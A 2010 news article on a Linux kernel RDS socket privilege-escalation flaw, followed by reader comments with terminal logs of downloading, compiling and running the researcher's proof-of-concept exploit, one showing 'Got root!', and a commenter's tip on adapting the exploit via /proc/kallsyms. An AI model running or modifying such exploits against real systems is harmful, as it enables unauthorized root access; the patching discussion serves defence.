The open-source Linux operating system contains a serious security flaw that can be exploited to gain superuser rights on a target system.
The vulnerability, in the Linux implementation of the Reliable Datagram Sockets (RDS) protocol, affects unpatched versions of the Linux kernel, starting from 2.6.30, where the RDS protocol was first included.
According to VSR Security, the research outfit that discovered the security hole, Linux installations are only vulnerable if the CONFIG_RDS kernel configuration option is set, and if there are no restrictions on unprivileged users loading packet family modules, as is the case on most stock distributions.
Because kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in the user segment, a local attacker could issue specially crafted socket function calls to write arbritrary values into kernel memory. By leveraging this capability, it is possible for unprivileged users to escalate privileges to root.
The company has released a proof-of-concept exploit to demonstrate the severity of the vulnerability. The folks at The H Security tested the exploit on Ubuntu 10.04 (64-bit) and successfully opened a root shell.
A fix for this issue has been committed by Linus Torvalds. VSR Security recommends that users install updates provided by downstream distributions or apply the committed patch and recompile their kernel.
I installed my kernel back on 01-Oct, so it should be vulnerable, but it’s not, even when I modprobed the rds modules and ran the code from root.
$ apt-cache policy linux-image-2.6.32-5-amd64
linux-image-2.6.32-5-amd64:
Installed: 2.6.32-24
Candidate: 2.6.32-26
Version table:
2.6.32-26 0
500 http://mirrors.kernel.org/debian/ sid/main amd64 Packages
*** 2.6.32-24 0
100 /var/lib/dpkg/status
$ uname -r
2.6.32-5-amd64
$ cat /etc/debian_version
squeeze/sid
$ grep RDS /boot/config-2.6.32-5-amd64
CONFIG_RDS=m
CONFIG_RDS_RDMA=m
CONFIG_RDS_TCP=m
# CONFIG_RDS_DEBUG is not set
# modprobe rds
# modprobe rds_tcp
# modprobe rds_rdma
$ lsmod | grep rds
rds_rdma 56776 0
rdma_cm 20582 1 rds_rdma
ib_core 40967 6
rds_rdma,rdma_cm,ib_cm,iw_cm,ib_sa,ib_mad
rds_tcp 8260 0
rds 70414 2 rds_rdma,rds_tcp
$ ls -o /boot/System.map-$(uname -r)
-rw-r–r– 1 root 1661060 Sep 30 00:56 /boot/System.map-2.6.32-5-amd64
$ wget http://www.vsecurity.com/download/tools/linux-rds-exploit.c
–2010-10-21 10:18:35–
http://www.vsecurity.com/download/tools/linux-rds-exploit.c
Resolving http://www.vsecurity.com… 209.67.252.12
Connecting to http://www.vsecurity.com|209.67.252.12|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 6435 (6.3K) [text/x-c]
Saving to: “linux-rds-exploit.c”
100%[=================================================================>]
6,435 33.4K/s in 0.2s
2010-10-21 10:18:36 (33.4 KB/s) – “linux-rds-exploit.c” saved
[6435/6435]
$ gcc linux-rds-exploit.c
$
$ ls -o a.out
-rwxr-xr-x 1 me 12900 Oct 21 10:21 a.out
$ ./a.out
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_ioctl to 0xffffffffa1009000
[+] Resolved commit_creds to 0xffffffff81069235
[+] Resolved prepare_kernel_cred to 0xffffffff81069138
[*] Failed to resolve kernel symbols.
$ sudo ~me/a.out
[sudo] password for me:
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_ioctl to 0xffffffffa1009000
[+] Resolved commit_creds to 0xffffffff81069235
[+] Resolved prepare_kernel_cred to 0xffffffff81069138
[*] Failed to resolve kernel symbols.
# ~me/a.out
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_ioctl to 0xffffffffa1009000
[+] Resolved commit_creds to 0xffffffff81069235
[+] Resolved prepare_kernel_cred to 0xffffffff81069138
[*] Failed to resolve kernel symbols.
yeah i had that too, it’s failing to find the address of the rds_proto_ops.
for some reason the kernel doesn’t export that address everywhere.
the exploit is easily modified though. you could do cat /proc/kallsyms | grep “_ops” find something you have the address of that you can invoke, from user space.
or since you have read/write in kernel memory there are ample opportunities to get rewt.
cheers
What is the bottom line for the average distro user – example: Debian, Ubuntu or Mint? Does this affect 32 and 64 bit or just one? Is thes RDS something you have to choose to turn on, or is it configured out the box? This was not all that clear from the article. Even for me, with 25 years of IT under the belt, slow down on the technobabble and please either re-assure the general user or show them a way to get patched quickly. After all, we don’t need any more zombied machines out there.
In a corporate environment and talking about servers only:
Am I correct that this exploit requires the attacker to have local access to the server? In other words, you couldn’t use the exploit to compromise a system behind a firewall with only port 80 and 443 open.
Is this correct?
I’m new to linux, so please excuse my ignorance, but do I type /boot/config-[current kernel revision] into the terminal? If so, I get ‘permission denied’?
FWIW, using uname -r comes up with 2.6.35-22-generic.
~# egrep RDS /boot/config-2.6.32-24-server
CONFIG_RDS=m
CONFIG_RDS_RDMA=m
CONFIG_RDS_TCP=m
# CONFIG_RDS_DEBUG is not set
CONFIG_HISAX_MAX_CARDS=8
root@bread:~# uname -a
Linux bread 2.6.32-24-server #39-Ubuntu SMP Wed Jul 28 06:21:40 UTC 2010 x86_64 GNU/Linux
root@bread:~# ./a.out
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_proto_ops to 0xffffffffa0296780
[+] Resolved rds_ioctl to 0xffffffffa028f000
[+] Resolved commit_creds to 0xffffffff8108b9e0
[+] Resolved prepare_kernel_cred to 0xffffffff8108bdc0
[*] Overwriting function pointer…
[*] Triggering payload…
[*] Restoring function pointer…
[*] Got root!
#
I am going to update the kernel right now !! 😀
$ ./linux-rds-exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_proto_ops to 0xf87ae9e0
[+] Resolved rds_ioctl to 0xf87a8090
[+] Resolved commit_creds to 0xc016e080
[+] Resolved prepare_kernel_cred to 0xc016e3c0
[*] Overwriting function pointer…
[*] Triggering payload…
[*] Restoring function pointer…
[*] Exploit failed to get root.
$ uname -r
2.6.32-26-generic
$
why did mine fail?